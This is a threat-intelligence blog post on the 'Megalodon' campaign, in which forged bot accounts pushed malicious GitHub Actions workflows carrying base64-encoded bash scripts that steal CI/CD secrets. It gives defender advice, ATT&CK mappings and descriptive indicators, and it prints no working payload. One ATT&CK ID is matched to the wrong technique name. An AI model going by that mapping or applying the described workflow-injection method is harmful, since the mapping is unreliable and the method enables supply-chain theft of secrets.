Megalodon GitHub Attack: 5,561 Repos Hit with Malicious CI/CD Workflows

/MEDIUM
Written by SCW Vulnerability Desk Vulnerability Intelligence
SCW threat-intelvulnerabilitytools
Megalodon GitHub Attack: 5,561 Repos Hit with Malicious CI/CD Workflows

The Hacker News reports a new automated campaign, dubbed Megalodon, that injected 5,718 malicious commits into 5,561 GitHub repositories within a mere six-hour window. This isn’t some casual defacement; the attacker leveraged throwaway accounts and forged author identities like “build-bot” and “ci-bot” to inject GitHub Actions workflows. The payload? Base64-encoded bash scripts designed to exfiltrate CI/CD secrets and environment variables.

This attack vector is insidious. By mimicking legitimate automation accounts, the attacker blends in, making detection difficult. The exfiltration of CI/CD secrets means direct access to deployment pipelines, source code, and potentially production environments. This isn’t just about stealing code; it’s about owning the entire build and deploy process, opening doors to supply chain attacks or even direct system compromise.

Defenders need to assume their CI/CD environments are prime targets. The attacker’s calculus is clear: compromise the automation, compromise everything it touches. This is a direct attack on the integrity of software development and deployment. Relying solely on code review won’t catch this if the workflow itself is subverted.

What This Means For You

  • If your organization uses GitHub Actions or any CI/CD pipeline, you need to immediately audit all workflows for unauthorized changes, especially those introduced by bot-like accounts. Specifically, look for newly added base64-encoded bash payloads. Revoke any CI/CD secrets that may have been exposed and rotate all credentials used by your build processes. This isn't a hypothetical threat; it's an active campaign exploiting a critical trust boundary.

Related ATT&CK Techniques

T1595.002 Scanning for Vulnerable Public-Facing Applications Reconnaissance T1078.004 Cloud Accounts Initial Access T1505.003 Exploitation for Client-Side Execution Execution

🛡️ Detection Rules

3 rules · 6 SIEM formats

3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.

critical T1505 Persistence

Megalodon Malicious GitHub Actions Workflow Injection

Sigma YAML — free preview

Source: Shimi's Cyber World · License & reuse

✓ Sigma · Splunk SPL Sentinel KQL Elastic QRadar AQL Wazuh Get rules for your SIEM →

Indicators of Compromise

IDTypeIndicator
Megalodon-GitHub-Attack Code Injection GitHub Actions workflows containing base64-encoded bash payloads
Megalodon-GitHub-Attack Information Disclosure Exfiltration of CI/CD secrets
Megalodon-GitHub-Attack Misconfiguration Compromised GitHub repositories (5,561 affected)

Written by SCW Vulnerability Desk

Take action on this incident
📡 Monitor github.com Free · 1 watchlist slot · instant alerts on new breaches 🔍 Threat intel on GitHub All breaches, IOCs & vendor exposure

Related coverage on GitHub

Ghostwriter Targets Ukraine Government with Prometheus Phishing

The Belarus-aligned threat actor, Ghostwriter (also tracked as UAC-0057 and UNC1151), is actively targeting Ukrainian government entities. According to The Hacker News, this group is...

threat-intelvulnerabilitymalwarephishing
/SCW Vulnerability Desk /MEDIUM /⚑ 3 IOCs /⚙ 3 Sigma

Huawei Router Flaw Triggered Telecom Blackout, SecurityWeek Reports

SecurityWeek reports on a critical flaw in Huawei routers that led to a significant telecom blackout. While details are sparse, the incident underscores the inherent...

threat-intelvulnerabilityidentity
/SCW Vulnerability Desk /MEDIUM /⚑ 3 IOCs /⚙ 3 Sigma

Trend Micro Apex One Zero-Day Under Active Exploitation

Trend Micro has confirmed a zero-day vulnerability in its Apex One security product, actively exploited on Windows systems. BleepingComputer reports that this critical flaw allows...

threat-inteldata-breachmalwarevulnerabilitymicrosoft
/SCW Vulnerability Desk /HIGH /⚑ 2 IOCs /⚙ 3 Sigma